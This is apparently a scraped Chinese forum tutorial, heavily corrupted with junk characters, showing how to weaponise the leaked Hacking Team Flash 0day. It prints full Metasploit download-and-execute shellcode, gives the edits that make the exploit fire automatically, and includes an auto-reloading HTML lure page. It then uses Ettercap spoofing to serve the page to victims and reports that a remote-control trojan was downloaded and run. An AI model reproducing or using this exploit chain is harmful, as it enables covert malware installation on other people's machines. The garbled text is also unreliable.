/ i5 |3 _3 B5 k; K! o6 s: D5 \ 三、flash 0day之手工代码修改制作下载者实例入侵演示 ; V. x* `$ D" v, s3 j
# J$ J- S+ u2 }; J- w
9 o+ _9 W& L% h0 h4 z- }/ { 利用到的工具: 2 g+ |) R% f0 S" u
; v: E6 L8 O% t( @& F. r# O
( D( o& y# B) `# `4 L1 I$ P; V Msf
1 Q1 d& j2 x! W4 H; K ; v. i! {/ a- R# S) M
* B4 L5 J" i3 O7 H
Ettercap 6 g6 e2 h- x; w5 t
! q* @: g! m) F6 B z: `- N* \
8 W f( B1 e0 `, C
Adobe Flash CS6 ; g9 b2 M* p+ w1 D# \! Y
. o* }5 B# i m8 u; V1 A& T6 N: p+ u
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 8 H* O8 @$ y0 j) ?/ l
4 b; i: ~4 ~' |) ]0 X6 X
) ~9 R+ c: q4 i' i% M+ ~ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
! S5 ` p8 E" p" @9 f7 W6 Y
L1 V; M5 g! h% M( D0 t! D- d2 E
3 M; \9 g: X$ B. k% C! t: {, S 如图:
; z w" j6 I" M- ] ) B. n+ z" [: o" v' Y$ j' B
8 ^& o# H8 I: ?, Y% s
8 l7 W$ q9 y) {* f( T# G
. G4 j$ z# v' Q4 u0 z7 r; W h7 U! I$ R; m- v
% k% C! ^0 [; V4 I ! f( b) T( Q3 f6 c* ~8 P7 I( W( I
' Y1 `" m3 Z& v E Z) W
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
, `) C- j* e% ~% D$ d# R
* E, @7 @4 c" \* @% B; F7 _0 S9 [4 g; t @) d: |
% P% F& p) Q) M, U0 d
- T( V: }: c( u: c4 G4 P, n3 V" q$ n* t/ @. v/ s9 b
G. T, \; G4 i3 x) } ) h% e; z2 N5 c2 v
0 V) q4 d% F# i& |8 c2 W3 P3 J
然后执行generate -t dword生成shellcode,如下:
2 I1 U5 q g9 ^" I& q& z
) ~! O1 b# o7 b) ?
* ?5 R0 I9 k. ~. c" X9 a
$ P5 a" s$ B7 t4 [; Z+ h: @# y6 M0 j
+ x/ L# x; S' `" p# v
7 R; Y* `; r1 [9 g 复制代码到文本下便于我们一会编辑flash exp,如下: ; L2 a# y0 ~3 |, p3 b
, P& }+ c- f O. }9 G3 m! v( F% e% C/ {7 J* g
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 M0 @* w2 p% t5 p2 r& D
* O9 q+ y2 T1 \6 E
7 [6 t7 E9 `5 F6 C8 Q
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
, y, S- n) f! S9 k 1 c0 V# T8 T- Y9 I# G
. m; x& _4 f0 ]
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
' l7 ]& x8 h& ]9 V" n
7 j6 c# J' B8 d/ H* I& ^7 `" g
, g: @# [7 W' ]3 u; u7 y 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
$ V% L1 S+ r ~7 X. N {
/ h8 f% E& H( ~
; o& {; ^" j+ q" c. c+ N3 m, | 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
- m) u- d. b( F o# [
. _+ a, F: G$ u0 N. P5 C% V1 ^/ p+ c- r3 r7 g% P$ u
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . a& j) f+ X, X9 z* Q
4 @' }, R7 [" r: i2 H) O x- Q! m) W( h1 C, C3 S5 @9 v
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 ^7 k' G6 M2 W* [, \3 \
$ c4 z; J M# h+ s( [) O \3 M
& y" B8 h+ J# A' j5 ] 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 1 Y$ q4 l6 ^- t+ @( Z H
* V' W4 h: t6 p9 O% Z t5 `6 h+ f$ t0 s2 h0 e6 i3 O
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / C: F* q8 F7 \/ B! n5 j4 w
, w( g/ `- N* N
: R) H& c( p" ]$ C3 S; | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ! n# W3 s. j% T% n* t
$ m( }) C4 w. c; U" V9 V& t
5 x9 D: J7 t7 m e ]; {
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
# r# o7 I4 I+ {: K7 z5 ~ + G: ~2 C1 G G, g) W! U" ?
2 I) ]( ?5 v% R- J 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 4 D6 @5 y$ G) ?1 y" l0 E& |
1 Q" a+ E3 z4 p8 q% X
% a' {7 |/ ^0 v: o5 s9 C
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
/ s/ P( A2 H1 w* ? r& L
6 D5 M6 y1 C ?6 n: u5 Z8 b" X, I M" q+ |
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
* V3 U5 t8 q9 x) j0 o
8 `) B' Y. H/ R' M( g% E* ?7 G/ z
) B# ~4 K2 _& D+ t0 N . ~" L# s5 \! b0 ?2 h, N: y9 e
5 ?6 M, j" [. O( T( a1 x" I) Y
( L; O5 u+ x' r4 J3 q
& W' |$ D. A0 y3 w. L6 i( \% L
% F5 E! X0 I0 D. Q3 f) A
/ G5 K0 w% ~0 B3 [5 p
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
( O; h6 K+ s$ X& J& N( a- z
* V6 [' _( B% W7 ]$ d% T+ K( B( |3 u! g9 H" [# d2 ?! M
& f. O9 l1 M& b4 g
) E- n. ?) Z3 ^1 {- V
) I1 I) ]' c: Y6 i+ x) i 先修改ShellWin32.as,部分源代码如图: 0 T$ b* k. V3 j: ?0 S& I z2 ^
6 C/ F: F2 G* @% @* K: j
+ t" q' s6 J) D$ Q5 R( b+ ]6 R/ f- a ; r5 C4 J& W" `7 a% ~/ y
3 {1 Q) T- @# u9 l4 ^
$ T. O4 Z2 N# ^% ?1 @9 _ 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
; ?, ]9 g0 ^; L- i r T9 U" r3 h 8 z- g$ K+ ~: r2 |; ]
* }% z# }, r8 x1 z
& ]& n% N# W/ d1 @$ G
3 o3 ^" [0 D, V, p4 m8 [" h5 Y6 ]# ?3 j7 p, q; q9 D) l3 \7 a
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
' X" u! j" U- ~7 \
3 N3 ?* T# v% s6 l V8 x7 X8 z! K. l
" @+ L) M' A9 f9 m; U 1 y5 Q; G8 f/ D0 G; T0 g
$ w- q4 t: m" K" [- u1 A6 M; S; A
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
9 m( u' K) U; z4 F3 b 7 S' ]9 N4 W4 B5 Y9 p' Z" P7 m' ]
, i* A/ ^% n6 r/ o) |9 R2 f & a' K; w5 k" N, q. c T" @0 I
$ H9 L' K, {, e& `- j8 O
5 R, y4 `1 H( T' R7 X: T* h3 Q3 o, w9 D
6 p1 i. f7 f s4 Q/ l+ ?! ?
/ }; T& q; Y3 T! N* ]. N+ a: t G, c. ^- Z
; f6 d% ^6 q$ R' b
! H8 q2 j' c2 l# C" Y
# J6 U, H4 b* N$ i) N0 Y 然后点保存,下面我们来编译一下,打开 & \* S$ K% w0 t! Q
; B7 w9 W: Q" w$ [ M8 k
. x( _1 K: R, B exp1.fla然后点文件-发布,看看编译没错误
4 _) @& N, ?- y, r1 z ) h, _, R; J/ o! a( r2 W
& x6 T% s% `" @5 j
% J7 r. \9 Y m7 z! M A9 F 0 s |4 ~4 | r* K2 Z
; v7 ?% y) l' C) X; ]( z$ a & Q0 g. c. V+ m4 u
, _; @) g# a9 ^) }, {3 s
C! i+ e9 H B9 A
, y4 b% F' w" c6 ? : A# |. _7 s% z# o; E
" e% J( w8 E3 P
/ f1 \: V+ J$ G" T. b4 o
7 ^$ F& G: h, {& S4 e# W; U! j" r3 U% v' Z( c$ l5 S. `" X
然后我们把生成的
( i1 f* f# j: @' r9 b+ J
' { ]! a; J( U1 t6 T, y
; X l( d5 q* W exp1.swf丢到kailinux 的/var/www/html下: ; c: E8 V& `+ ~
! p0 u& m! t" s
6 u; L. f2 p7 ]+ A, p/ }$ v 然后把这段代码好好编辑一下
& i2 m8 O1 n$ B7 Q
% W- ?/ Y: m9 S; I. O: N6 |
. e Y& W. X; K# M# m 4 a2 @% U3 R. E; i6 g9 w
/ ]" w5 m7 ~1 X
5 U0 g% M0 [' o* ?7 L
) P2 ^4 d+ s5 F4 [# q. p 1 n9 r$ J9 w t3 S
% A( @; J4 }( G% X
/ }+ K2 Z$ Z: Z7 o ' p: e% b7 X9 g0 i- h8 M
6 K( b6 Y7 u: w3 u, E
d# M* `& ?! n5 X4 r
5 s$ J) S+ z" ^- T' l
: w! T, P/ d- h- H# J8 [4 ^ : `. F) g" v7 t6 U8 p
- k5 ?- }; Y7 M* j5 H7 Q4 n$ N ?+ d) k4 [! k& M6 H5 O
3 b$ s* x; R1 d( _
, i9 F2 W6 Q0 f9 `: Z% k% ]3 M5 `: X
<!DOCTYPE html>
3 w; }5 N0 _* p, ? " \0 B; @! n6 `
' m) {2 J% |* G# g
<html> ( V; N1 k, E& M$ j6 U
9 N7 ~" t0 d6 A# [( T: \8 z1 Z |
/ V z7 K6 |7 `# g2 G <head>
3 B' e, p0 @+ ~* F- i! m Q
' l1 D- ~, d9 P. P) F! _" k2 I2 w; n+ g' Z2 k; R
<meta http-equiv="Content-Type" content="text/html; & B) t: g3 N9 `4 T+ w G; V6 f
: A7 P, J+ U M# {
, S4 \2 s @- c: B charset=utf-8"/>
& e0 d, Z0 ?" p
/ F( v7 [6 z# |3 X: l6 T# Q6 S$ P( E5 V, |; c* k3 L& v
</head> / r3 G, w" k' I) Y& k6 I
: P) @3 n5 e$ B- _1 p
& @+ p) ]- X/ ~6 j. |+ h, \ <body>
( ~2 g! b9 j- D9 ]3 p. ^ # ?* O* Q6 U X; D) W8 [, ~! _ |+ K8 D
0 r2 _6 M, _0 ~$ g. t' I( d/ P$ `/ x <h2> Please wait, the requested page is loading...</h2> 7 z% v0 c1 o$ W/ W
Q* i9 W8 W b- F) I! s
5 K( @$ i2 [, E* M <br> ' @6 U/ @% V9 O s4 n4 e, a
' n8 v4 ^! X3 U1 \, }0 |
7 y1 W8 I0 g2 ? <OBJECT
$ F+ {& G' w0 D: t" T) |+ c + D- H2 g' M: `6 ]
* O$ Q" n% T. R6 D) |( q1 K
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 2 A( `: {6 X8 P+ w7 T
; T9 n/ K$ ]4 j4 z
- d4 f5 T' c% t. x3 D# r3 _ VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
1 y) t2 v \# M- U 5 O) e( ~8 _2 y M- C7 l
/ c/ H; i L; Y7 r- M( a
</body>
6 z% M F& K" p: a. r
$ m8 b0 w9 C0 b9 @# H
% I9 U9 [8 O& Z- H, ?' G, ` <script>
, Y+ q9 N' l) N- b: \/ c& T X / m4 Y) n% c, {
* p7 K. a4 Z* E, A
setTimeout(function () { 0 @: P! q8 ]0 B2 `0 ^& a
( c, S+ r2 A: F) i0 r! |
" g, H" o5 d0 T( N8 \; L * @, ?2 |- I q% I3 ?. T i& c
* K, D4 c( h6 u- l2 C' S5 E+ O; l. P6 `) x! m/ q9 R
window.location.reload(); 7 k/ I# H% G6 X( Y' J; w; N& L
. R0 y$ d7 j0 W
% u) F4 E9 g- ~# n }, 10000); ; O. `- c" f7 h
- k% I9 ]( F- e% W; n9 ~1 t6 i. x6 t+ u0 j- `. i& y
5 z f9 d( _4 e. L
" \" i, ]4 _, H3 \ t( i
2 b& s) c( ^/ L$ a/ k2 L: ?
</script> 6 E8 M; U! E0 S$ r5 S9 g, L+ h
. i8 Z$ |# N. {# b% a
: K0 W) K1 k% t3 d+ Z) I: s </html> & K6 {8 x0 d6 ^9 D& `' _3 A
3 p* G8 Z: A( N! r5 }9 ?& d" C% i$ Q# `/ t
# Y# ^, o0 G1 {/ C8 t ( V2 I/ J: Z! V, `4 y
4 V# W( S, G: R& {$ V0 [8 ~: p
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
2 T% ~: v% k \5 W! W " ]4 w% s5 E+ L% R: s
! d/ u( e0 ] V6 B! r u0 ?
7 K* S8 D9 i; C7 Y" p8 N1 b 5 V4 ?# b3 Y! G% f
8 d _( k. f* T* q& k- J+ D
& E% V% {% t6 e. z+ D, c 8 \) [% o, L5 M) m# O( H- g
3 W6 s p; m7 I. [
% e2 N4 y6 T0 D) I1 {
9 R, g3 @. _8 d8 U" @
* g" e4 T/ W3 F8 X7 r5 s& u4 O / t5 b) A0 F% y: X
' o! e9 z4 d) m5 z% Y9 R8 ?% H6 k2 E
& ^: V( k7 M8 [* {
) E% T9 y l( M/ l" O. j2 k
/ o# w- X4 x: k6 F& E3 n7 t/ e) U' a
下面我们用ettercap欺骗如图:
) }2 }# ]' s, q: f& P# p
) m. Y6 @$ m: @4 @
# q& e1 O# i( h Q# J. j5 b& x 5 u' C B- l2 a8 _
+ z O9 ?+ c+ q4 z* j$ q% p* y! s6 H7 g
+ I2 C6 K2 q+ K x& W( {2 L
6 d1 `( k, B5 K0 x
5 L' p. M, ^5 z; H 下面我们随便访问个网站看看: 5 O% V: X/ y @4 n0 m+ y1 T
, Z0 u. S5 N" h9 |0 ^4 U# ~7 N/ j F1 B7 L5 r E2 @
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
7 F8 w$ [% }; k3 Z $ N; S m: G0 t" w
4 y8 s8 S1 J" Y; I# E& v
* ?# ?% T9 K. s' r% X
' Q4 q6 K, p% r: `+ p+ q( j
5 c% I1 o: m( U0 d* f
我们看另一台,
' R+ j3 k4 _4 u$ a. R. h1 Z ) b7 C& V2 q" Q7 ]( W
( V. }" R- J, j 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ( H& ?9 u0 x4 t0 x3 r- N8 t
|